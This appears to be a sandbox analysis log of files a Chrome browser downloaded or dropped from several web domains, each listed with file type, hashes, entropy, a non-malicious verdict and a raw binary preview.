                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:6D4B3F368D5911E7A155C2C7373E56B1" xmpMM:InstanceID="xmp.iid:6D4B3F358D5911E7A155C2C7373E56B1" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 334 x 81, 8-bit/color RGB, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):13711
                                                                                                                                                          Entropy (8bit):7.965899029937212
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:hSHIIHUCD4wagyEhj4VNNDE0U4ATuixbNVnyTo4jfm3/6LVTE12Qw992ifau86WD:I50wLymMlP7qpQw/2Tsa2DpLWAws1NTD
                                                                                                                                                          MD5:A14B1EED93690BBECBB6B049B53DD7A6
                                                                                                                                                          SHA1:212AAA678DF915109BAA9E322F9E930448408AD6
                                                                                                                                                          SHA-256:33142589E5F294F4E4166E269F0EFD6ABA18CD7034E95F64E1AEA47A187A9319
                                                                                                                                                          SHA-512:3EB48B612353F353A38948C569B8233D65BA1F2EA263D2F931F18AE4D34BEC25EC7C2A1F3E38B95DF64B112B1CEB35A8679CC78EB97F54FD1F48F5BF1A6919AA
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...N...Q.....2.......pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 12328
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):3610
                                                                                                                                                          Entropy (8bit):7.938711080111192
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:XKAwdhOZsbcJeBDSgVAOOl+nRCfFpswLCwLOeuM67MxZw6BdUL9ZPQ9Cba+T0yRW:tett2unsfF3/OeaIw8dUvt0L0MFtJwJ8
                                                                                                                                                          MD5:E23F3A0A4EC65A23DFC4AA62092FD2CD
                                                                                                                                                          SHA1:3A6B655B11E67F05C6A892C7453EDCE9A5DBE197
                                                                                                                                                          SHA-256:A536D285DECA9B96FACE9FCBE00017E107E48BAC06750342CE962E2758FE8F4A
                                                                                                                                                          SHA-512:135E0A55B189BBAAB2E8BC5DE254317B6135E70CEC5304F47CD1E4D2CDE30BFDC20328D6BB24881607CEC0AB12D7B9D9781CD6A9952FBACE597A877B4493F875
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://brhrjf.yuhu06.xyz/061410/rcenter/common/js/jquery/plugins/jquery.poshytip/jquery.poshytip.js?v=1717580749344
                                                                                                                                                          Preview:............ks...*.1D...N.<.8I/3.8.x.....Z.,.(R!!........_..I....,......b..e.&...?..HF........Up/.._7Y..a.......}..M..m.||...O?..?..{|......m....g"..t.YO&a:.D"...X..|.e......YE./Q(...6I(.Q"B...A....B.^....e....K....S.^.....".9Lf.a.v1..m6....F..;?..r......W<].c.Q.a......L.>..(E.Z....E.5*...6..+4j....[7.o..a4..<..1.0:4.c...........FI"H{..i..cgoN...8.t;...2].oYt....]*e.2.b..5v....[.%.c....5p..Z....pW.JX..o...Z..8....%..ai....<..E./.8.jl.&...'.8V#Q.I....:.,......Y.4.0'g.A...\D.....Rf...l......J......W.}N#.Rh.5.4..-....e..L.|...lX..s...U...0-.z[w.\>....Bm..X......Pk...../;...y...L.@7n.. ......=O.....Uj... ....Z;...*Z...K.d".j`..;.U.....RI. .vq...G.-..s.v.O.CRD.}+.`'.R.w.fPQ.(..p.:.P....X[....8Jw.....,.a.+.....Y.(J...`....:H......d.u..JF..dbU....../ 2.pl.WAv/....k#...s.%y....m.I..pT..r..(|..)O..K.....v_rW.x....(^(QC.D.._.^..V..d..c..W.]...):..y.d2,).4A<..i...3.sk........s8T.WY......K....>...)v.\.N.R5........d....%S.5.BR.U......c..Z.#!.\&?C.#
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS6 (Windows), datetime=2022:11:18 23:58:55], baseline, precision 8, 334x81, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):39179
                                                                                                                                                          Entropy (8bit):7.597323531563319
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:d60VlYdPp0VlYgsb8IYydHOllflnf4mKK7JnOiVccGGal:1YqYgsnEtAqJNVvGhl
                                                                                                                                                          MD5:DE77A7E9A3982B06BD7F4305D9DE5747
                                                                                                                                                          SHA1:8FA997AA39F517E27007B03C8D55699169792406
                                                                                                                                                          SHA-256:1DB33D4300EAFB21A5F34D8B4A6D531A02B7E68FBD7D9CEAC75D604DE796214F
                                                                                                                                                          SHA-512:1A5C7DD6CE78CA1EEF19EE3DF4ACCAC8CA137DC30E54083B7B5937BE9F3A80127F1A37E1A9B2A11A3F9A223F0DE00FAD9EB1D67F05D63D9CF245C215F8F7C6FC
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://www.image110.com/uploads/27eeee660ef8e616ea1edc3bb1bad1ca.jpg
                                                                                                                                                          Preview:.....xExif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop CS6 (Windows).2022:11:18 23:58:55..........................N...........Q...........................................&.(.................................B.......H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................'...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...e......3*..ki.Hips....W..................O..+?.j..>.QN=O..f...^.......}..0F.B4 ...]...........6...K..._.....7.....y..`.I..J.*...U...x..%.. ..h..........
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 54 x 54, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2664
                                                                                                                                                          Entropy (8bit):7.631667121244574
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:tzvn20tW0WSJ3taMKEgcTYkoENLUv7GeRftG85wio+t7K0b57xbcYnF6P9:Z20Q0WkaMKxOoEyKk9wYfb57B8
                                                                                                                                                          MD5:ED4AA072374480B9DF9CEBD3EA475521
                                                                                                                                                          SHA1:FC7BC4312862518423B586BEB1FDFBBD2FFB455D
                                                                                                                                                          SHA-256:C01919C94C29550421F96A5A67814718127D891402EC5DC88CBD80267D68C166
                                                                                                                                                          SHA-512:383F7C024EAFC4A1C67C3603966B8608DE0AE2E1F6193DECB6D8ED684E2CFB1B99528F1DBF2F3AA8B53D59A3FBD734A8824F5A032D88DD91A4FE150C8CC3C29A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...6...6......Ej.....tEXtSoftware.Adobe ImageReadyq.e<...)iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:BB692B7021F511EE95B3B3F5D30ADB92" xmpMM:InstanceID="xmp.iid:BB692B6F21F511EE95B3B3F5D30ADB92" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:34D3EEFDF3A111E79795E421D03D6964" stRef:documentID="xmp.did:34D3EEFEF3A111E79795E421D03D6964"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......IDATx..ZklTE..}....Zy.*.......PAP..`..">....+j... ..I. P.......-...J|.... .Z..t.]...]....>..%......
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1x1, components 1
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):332
                                                                                                                                                          Entropy (8bit):6.8679847753890115
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:dfNIOW/mfM8plt//kC7kmdViN0XxgRPWTTbOsvWGKkCHdcfmcGn1NMf/qLnDzofo:FC9YM8p//slJ0Xx0WzOsvWGKkCHdcfmx
                                                                                                                                                          MD5:BD9D76386CEE85AC4BE2F43FB3156A02
                                                                                                                                                          SHA1:D1BFC8928661CA2B2F71562EDC745419C582A88E
                                                                                                                                                          SHA-256:A26A53CFBFBF7CAE14898AC89EE39558CD9ED81D4E1D86FF2E5D17B6C185DC1F
                                                                                                                                                          SHA-512:7CDBE4BDD27C94FB93BE7DFFD3AB47BFA785FF578FB6EBFB5DEDA7527CA1122A76AAB1BBC900C02AA2E95686DC0B52CE95C9589721E89B771FBC7079C5057AD8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://ocsapi1961.hydqef.com/ocs/cc.png?1717972856368
                                                                                                                                                          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342..................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.................................................................................?.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):17264
                                                                                                                                                          Entropy (8bit):7.957851912730042
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:Bd/F5IhIlqmVUgkOduOyX2sjzELCfBhC6DvFSi9q:B70IImVUvOduOyGsikhC6DvFE
                                                                                                                                                          MD5:CF4793E4F829969195CB58EFFDFFCC3C
                                                                                                                                                          SHA1:73EA126C25F1EC7E02A3216AFBDC68204EDC18BB
                                                                                                                                                          SHA-256:1E91C94ABA2BC799802FCB49FEE566D9095FE76D2C2EEBE7E876E06E50DD6E00
                                                                                                                                                          SHA-512:6C837B9092076E7DA94E8305573C76631CA9402B2E903D6B9EF10EB18585D874B1F29F2D2267D34DCCE18AEAE0172A3E0023354C01EF7A44827EA09A264B8D84
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/video/gd_h.jpg
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:BF908D248D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:BF908D238D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):17241
                                                                                                                                                          Entropy (8bit):2.6564108516880913
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:wSiYkEWmfURSBIM+ixNXrNGVmGvsc5ZGPUtU0vGeThlq:wSlk6kM+g5dUtUUJThlq
                                                                                                                                                          MD5:599B2B961205C6D17341FC6D04C94F05
                                                                                                                                                          SHA1:F597C4677D99DE6B79085F5FA245FF210B181DD6
                                                                                                                                                          SHA-256:F5F3A63CFD98BE1B993951A90C4E2E85F69CEF59D88FCF7E30C5B1881D83A2BE
                                                                                                                                                          SHA-512:2267486D65088D81571371CF8492996C3AFFA1043092F2773944358DB412DBED06EA557E51C7D327DE749822DAF629FB3F107C5179D499214C6C913B9427120C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/live_dg.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......pHYs...............=JiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <xmpRights:Marked>False</xmpRights:Marked>. <xmpMM:OriginalDocumentID>uui
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 428 x 209, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):77864
                                                                                                                                                          Entropy (8bit):7.991897314130585
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:1536:+1B3oY5y7Xfde5VRF+hUZtDiiRqz/XyQWDEWt1qxX8Qkb7dGmnyfE0u:OB4tPdWRUSZYzsEl2Qkf8lfER
                                                                                                                                                          MD5:399E94361E4FF3346F2B83A32AE4C019
                                                                                                                                                          SHA1:1867B3C4AE21B30CBA904E36A6354244683346C0
                                                                                                                                                          SHA-256:01CC14175BCA5CA2ADE98EAEFD5C64BBE17E365640BBA6AEC0EC326C9DEAF4A2
                                                                                                                                                          SHA-512:D7D3D3C15B6354DC44A4BD7CCB7770E6CA7F2FC0294C70FFAE071F14C493459AADF1A4365A7A49AFA4BA546E1D49AB77AA03BC45C165C70CC4B4972DE6D6175B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:E6A55FCAC5B811E7A08E825F09D1C3B7" xmpMM:DocumentID="xmp.did:E6A55FCBC5B811E7A08E825F09D1C3B7"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E6A55FC8C5B811E7A08E825F09D1C3B7" stRef:documentID="xmp.did:E6A55FC9C5B811E7A08E825F09D1C3B7"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>+.P...,.IDATx..].X.W.^M.1.X....1..K...{........E. ..`.."...W.Jo.Y......e].%..b.....0...3......+..>.b....,f......
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 2909
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):911
                                                                                                                                                          Entropy (8bit):7.814395167373869
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:Xff+yozp6y5X85idtYXrsLVh4YyrickQNuQjI0vf4W2:X3+7zQSXgyB4YyjkQNnjtvf4W2
                                                                                                                                                          MD5:287B6B8F1EF0D064F10FB8C6063DE18E
                                                                                                                                                          SHA1:C0671E7287F3390346C2250474CCDC0A11015DB5
                                                                                                                                                          SHA-256:7C6A09F79F2F68528F3ADAC1C437567AE93B76983A0BE73CFDBD2C5BD45A0731
                                                                                                                                                          SHA-512:77BE681AA9207D2E28E4A664E755D0F63577F635F73405E72926C860A0CCE6D862CE9CFC7AE58CDD854ED29C46B9CCADAD28FE9AB5FE577151E9660BDD51318C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://brhrjf.yuhu06.xyz/ftl/commonPage/themes/hb/css/pc.css
                                                                                                                                                          Preview:...........U..8.~..).6.+.@...t..j..V..8.Z.F.l.F..w0.q6.?^..*f..f.... .B.&hu.\...<(w..b...7/...bR.....E.%......jWH>.j..6F+..T$kR.L....L#.26..N.....%'...\f...1Qn...>,.<.f.h......Q...HHA..d.E%7".QU.d...Q..*..qSt.\.Y.HM..v|...M.......^./.z.M'.....t3v<....g....I.$.T..2K....AU....I.x....2..........%%...,.mV.Q..g}:.........2]..t.G.Y.7.=o.9.........B.j......M..7.o.....W.bt)1.....8......EW6}....I......D3.,..2;..x..o..(A.2.Z(...^....Ty...`E.........(..A.5=.G..`eo.V#..96..$..I.E.5y#..K........r..=].ho/.79..X1...is>.'/)Q....vRl.lN.........O.~........$......v....V..>.....CC...r..d.....!........%.....[...-.....7.(y......o.'....tp.<....g.......~~.8.v..o. ]...!}$|..l...^&.%Q.dN.W........._..6....{..s.....+K..:%|.q.?.4SW.X....2..(..||....[]*...T....\.3.6.0J..!../.<...9.......c.G..Ed..`.{w.ig..q8Ac.....dL.o....s..y...|w9.jY....`.RV...<o........{B...n..]...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):12051
                                                                                                                                                          Entropy (8bit):5.117741790837475
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:0Pf+0Sju4NyRSTTPhvygOdWuTdC3d7QPXLHOm8cSCl1Ej3m7YAPzhsoqFncJ0j:0Pf+fAwfcXSaGLj
                                                                                                                                                          MD5:3B4680DB1E065116488F065419CA9F58
                                                                                                                                                          SHA1:6C646601C5656FF6CB1FDF9D5B95823F41E9BCFA
                                                                                                                                                          SHA-256:E2BFB9FC21F2A1A6E33C7C5ED20DE13EF2EF4BCF266AA4B2E6F2FEE06F8F4EAF
                                                                                                                                                          SHA-512:9A7945A88CD66465A16A33CCFA1D783EBCB833BB7ED8A38E341AA3D61BF6350976C1628DC43F95CE562FE9A3A7832A6E997E69FB12221D9E4CE88A031EC2B60B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://brhrjf.yuhu06.xyz/ftl/commonPage/js/websocket/CometMarathon.js
                                                                                                                                                          Preview:/**. *. */.function MSiteCometMarathon() {.}..MSiteCometMarathon.prototype = {.. /** ........ */. SYNCHRONIZE_KEY: "_S_COMET",. /** ........ */. CONNECTION_VALUE: "C",. /** ........ */. DISCONNECT_VALUE: "D",. /** ........ID */. CONNECTIONID_KEY: "_C_COMET",. /** ............ */. SUBSCRIBE_TYPE: "_S_TYPE",. /** ........ */. SUBSCRIBE_VALUE: "R",. last_active_time: new Date().getTime(),. url_websocket: null,. accept: function (data) {. var message;. if (typeof (data) == "object") {. message = data;. } else {. message = eval("(" + data + ")");. }. if (!(message._S_COMET && message._S_COMET == "S")) {//............ console.info("....,......" + JSON.stringify(data));. var subscribeType = message.subscribeType;. $.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1x1, components 1
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):332
                                                                                                                                                          Entropy (8bit):6.8679847753890115
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:dfNIOW/mfM8plt//kC7kmdViN0XxgRPWTTbOsvWGKkCHdcfmcGn1NMf/qLnDzofo:FC9YM8p//slJ0Xx0WzOsvWGKkCHdcfmx
                                                                                                                                                          MD5:BD9D76386CEE85AC4BE2F43FB3156A02
                                                                                                                                                          SHA1:D1BFC8928661CA2B2F71562EDC745419C582A88E
                                                                                                                                                          SHA-256:A26A53CFBFBF7CAE14898AC89EE39558CD9ED81D4E1D86FF2E5D17B6C185DC1F
                                                                                                                                                          SHA-512:7CDBE4BDD27C94FB93BE7DFFD3AB47BFA785FF578FB6EBFB5DEDA7527CA1122A76AAB1BBC900C02AA2E95686DC0B52CE95C9589721E89B771FBC7079C5057AD8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342..................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.................................................................................?.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1721
                                                                                                                                                          Entropy (8bit):7.852822511297969
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:w/6zON36zNzyjnh8ctimwek9OSkbsHn9Ap0dwLFJE:wSzYPrttkYe9A1LPE
                                                                                                                                                          MD5:9781464C7C55D9366512DCDD5088AAD2
                                                                                                                                                          SHA1:5D55F50A4132B78F18E0EBB894BCAB130F5B5798
                                                                                                                                                          SHA-256:88BDEEB60E51B3DD2D7505B845879430A1E7AC4A289C4B8B3223BFBBA2DEFBF3
                                                                                                                                                          SHA-512:C31F4E4F3C372A641E2C860880808C3BA4DBDF773F8A2B51F2BD3BCD798C04EA89EC2D9E5EACA2126F24BDC23BCD31DEFAE02260C2638337B6E936B20DB3ED37
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............;0......pHYs................kIDATH....o.W.......w....k.....Q..$.....R.............5.P%(}*T.....<T..+.R.hi...Ic..N.;....^......9<...B.*..<}~G....c.$..D..].S.sO.<..W....d.Pq..p}.L..a.*........Z.............l....k.4..V......?...4.g_K.0...<.P........*j...|.-.C.M..E,..9#...B.lz.K.....[..n`.,...pM...(....f`%U.\l..#?.......[....x..l..i h)..=}.. .FM.J..2.,=..O>...\:...U..q...m.t...$.+... .8....z%w...T.+A.....>t......khlk.3.`....nvi..v&lN?...@xn|...u-v..QYx.mG.&.;.;.(w..Q.........}.,..[..y..j.....0.f..zd.....iP@5$..........v..<.Z[PV..c.....3..=..*@M.....Q.F)8.... ...@x..k..k......[...}..T....*.G..!...V..x.9hR..&....tq...ZD'C.. ...m8....Z...P.@.....C..@..%>...wf...@.GP(.........v9.T......a.q.r......K..6+.A-........J._{...'.i....>....>.Y..?x...{#A..t.....%c;......./..../.....n..KV..L.Y..0.N...$X.v.V.9T.%,O,....7......r).L.../.C.W..O.,....G]....R...F.@{..ZSz..\.....F......kL.J..KvA0AD..q..{.P.!.d*....T...Dr.....CH..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):17264
                                                                                                                                                          Entropy (8bit):7.957851912730042
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:Bd/F5IhIlqmVUgkOduOyX2sjzELCfBhC6DvFSi9q:B70IImVUvOduOyGsikhC6DvFE
                                                                                                                                                          MD5:CF4793E4F829969195CB58EFFDFFCC3C
                                                                                                                                                          SHA1:73EA126C25F1EC7E02A3216AFBDC68204EDC18BB
                                                                                                                                                          SHA-256:1E91C94ABA2BC799802FCB49FEE566D9095FE76D2C2EEBE7E876E06E50DD6E00
                                                                                                                                                          SHA-512:6C837B9092076E7DA94E8305573C76631CA9402B2E903D6B9EF10EB18585D874B1F29F2D2267D34DCCE18AEAE0172A3E0023354C01EF7A44827EA09A264B8D84
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/video/gd_h.jpg
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:BF908D248D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:BF908D238D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (1508), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1508
                                                                                                                                                          Entropy (8bit):5.8012686077032365
                                                                                                                                                          Encrypted:false
